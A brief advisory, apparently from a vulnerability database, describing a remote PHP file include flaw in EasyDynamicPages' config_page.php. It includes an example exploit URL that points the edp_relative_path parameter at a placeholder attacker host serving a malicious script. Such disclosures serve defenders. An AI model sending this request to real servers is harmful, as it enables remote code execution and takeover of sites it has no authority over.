EasyDynamicPages config_page.php Remote PHP File Include Vulnerability

EasyDynamicPages config_page.php Remote PHP File Include Vulnerability

The following example was provided:

http://www.example.com/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://[attacker's_site]/

The attacker must have a malicious script hosted at the following location:

http://[attacker's_site]/admin/site_settings.php